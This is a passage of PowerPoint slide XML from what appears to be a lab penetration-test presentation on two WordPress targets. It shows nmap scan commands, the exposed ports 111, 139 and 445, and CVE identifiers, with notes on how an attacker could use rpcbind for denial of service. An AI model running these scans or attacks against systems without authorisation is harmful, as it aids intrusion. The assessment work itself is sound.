                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Command Used: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>nmap 192.168.1.110</a:t>
            </a:r>
            <a:endParaRPr sz="2200" u="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>[$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> nmap -sV 192.168.1.110 - exposed ports and services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>.] Nmap scan results for each machine reveal the below services and OS details:</a:t>
            </a:r>
            <a:endParaRPr sz="17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t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;95;p1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6" name="Google Shape;96;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1468825"/>
            <a:ext cx="8520600" cy="309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372500"/>
            <a:ext cx="8520600" cy="1683600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Exposed Services </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>(Target 2) Command Used: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>nmap 192.168.1.115</a:t>
            </a:r>
            <a:endParaRPr sz="2000" u="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>[$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> nmap -sV 192.168.1.115 - exposed ports and services.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>] Nmap scan results for each machine reveal the below services and OS details:</a:t>
            </a:r>
            <a:endParaRPr sz="1700">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t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;102;p1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3" name="Google Shape;103;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1468825"/>
            <a:ext cx="8520600" cy="309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4409925" y="905875"/>
            <a:ext cx="4734074" cy="4225800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;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000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>This scan identifies the services below as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>potential points of entry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="4100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;110;p2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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Target 1</a:t>
            </a:r>
            <a:endParaRPr b="1"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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Port 111 (rpcbind)</a:t>
            </a:r>
            <a:endParaRPr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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Port 139 (netbios-ssn)</a:t>
            </a:r>
            <a:endParaRPr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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Port 445  (netbios-ssn)</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Target 2</a:t>
            </a:r>
            <a:endParaRPr b="1"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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Port 111 (rpcbind)</a:t>
            </a:r>
            <a:endParaRPr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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Port 139 (netbios-ssn)</a:t>
            </a:r>
            <a:endParaRPr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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Port 445 (netbios-ssn)</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Both machines are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>same copy of wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>for redundancy purposes, but with differing </a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>security parameters/implementation.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Both were working under a Load Balancer.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">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15000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Critical Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Google Shape;116;p2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oboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The following vulnerabilities/CVE’s were identified on these targets. We used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cve.mitre.org/index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="114300" marR="114300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="146667"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Common Vulnerabilities and Exposures (CVE®) is a list of entries — each containing an identification number, a description, and at least one public reference — for publicly known cybersecurity vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Target 1 &amp; 2</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:srgbClr val="FF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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>CVE-2019-0040, CVE-2017-8779, CVE-2017-8804, CVE-2012-1816, CVE-1999-1349, CVE-1999-0189</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Port 111 is a critical vulnerability as it is used in PortMapping; which always listens on TCP and UDP. It is used to map other RPC services such as (nfs, nlockmgr, quotad, mountd) to their corresponding port on the server. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>An attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>, using Metasploit,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> could use this vulnerability to trigger large unfreed memory allocations on the system leading to a remote Denial of Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>CVE-2007-5580, CVE-2007-3923, CVE-2002-2138, CVE-2002-1712</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> Port 139 is a critical vulnerability due to an attacker being able to run NBSTAT a diagnostic tool for NetBIOS over TCP/IP, primarily designed to troubleshoot NetBIOS name resolution problems. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>NetBIOS is a service which allows communication between applications such as a printer or other computer in Ethernet or token ring network via NetBIOS name.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
